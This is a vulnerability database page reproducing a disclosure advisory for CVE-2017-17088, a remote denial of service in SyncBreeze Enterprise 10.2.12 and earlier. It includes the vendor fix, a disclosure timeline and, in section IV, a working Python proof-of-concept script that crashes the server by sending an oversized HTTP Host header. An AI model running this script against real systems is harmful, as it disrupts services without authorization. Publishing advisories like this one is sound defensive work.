Vulners
Lucene search
Sync Breeze 10.2.12 Denial Of Service
🗓️ 15 Dec 2017 00:00:00Reported by Manuel Garcia CardenasType 
packetstorm🔗 packetstormsecurity.com👁 47 Views
| Reporter | Title | Published | Views | Family All 9 |
|---|---|---|---|---|
 | Sync Breeze 10.2.12 - Denial of Service Exploit | 15 Dec 201700:00 | – | zdt |
 | SyncBreeze Denial of Service Vulnerability | 20 Dec 201700:00 | – | cnvd |
 | CVE-2017-17088 | 19 Dec 201715:00 | – | cve |
 | CVE-2017-17088 | 19 Dec 201715:00 | – | cvelist |
 | Sync Breeze 10.2.12 - Denial of Service | 15 Dec 201700:00 | – | exploitdb |
 | Sync Breeze 10.2.12 - Denial of Service | 15 Dec 201700:00 | – | exploitpack |
 | CVE-2017-17088 | 19 Dec 201715:29 | – | nvd |
 | CVE-2017-17088 | 19 Dec 201715:29 | – | osv |
 | Buffer overflow | 19 Dec 201715:29 | – | prion |
`=============================================
MGC ALERT 2017-007
- Original release date: November 30, 2017
- Last revised: December 14, 2017
- Discovered by: Manuel GarcAa CA!rdenas
- Severity: 7,5/10 (CVSS Base Score)
- CVE-ID: CVE-2017-17088
=============================================
I. VULNERABILITY
-------------------------
SyncBreeze <= 10.2.12 - Denial of Service
II. BACKGROUND
-------------------------
SyncBreeze is a fast, powerful and reliable file synchronization solution
for local disks, network shares, NAS storage devices and enterprise storage
systems.
III. DESCRIPTION
-------------------------
The Enterprise version of SyncBreeze is affected by a Remote Denial of
Service vulnerability.
The web server does not check bounds when reading server request in the
Host header on making a connection, resulting in a classic Buffer Overflow
that causes a Denial of Service.
To exploit the vulnerability only is needed use the version 1.1 of the HTTP
protocol to interact with the application.
IV. PROOF OF CONCEPT
-------------------------
#!/usr/bin/python
import sys, socket
host = sys.argv[1]
buffer="GET / HTTP/1.1\r\n"
buffer+="Host: "+"A"*2000+"\r\n\r\n"
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect((host, 80))
s.send(buffer)
s.close()
V. BUSINESS IMPACT
-------------------------
Availability compromise can result from these attacks.
VI. SYSTEMS AFFECTED
-------------------------
SyncBreeze <= 10.2.12
VII. SOLUTION
-------------------------
Vendor release 10.3 version
http://www.syncbreeze.com/setups/syncbreezeent_setup_v10.3.14.exe
VIII. REFERENCES
-------------------------
http://www.syncbreeze.com/
IX. CREDITS
-------------------------
This vulnerability has been discovered and reported
by Manuel GarcAa CA!rdenas (advidsec (at) gmail (dot) com).
X. REVISION HISTORY
-------------------------
November 30, 2017 1: Initial release
December 14, 2017 2: Revision to send to lists
XI. DISCLOSURE TIMELINE
-------------------------
November 30, 2017 1: Vulnerability acquired by Manuel Garcia Cardenas
November 30, 2017 2: Send to vendor
December 6, 2017 3: Vendor fix the vulnerability and release a new version
December 14, 2017 4: Send to the Full-Disclosure lists
XII. LEGAL NOTICES
-------------------------
The information contained within this advisory is supplied "as-is" with no
warranties or guarantees of fitness of use or otherwise.
XIII. ABOUT
-------------------------
Manuel Garcia Cardenas
Pentester
`
Data
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
15 Dec 2017 00:00Current
7.6High risk
Vulners AI Score7.6
EPSS0.30343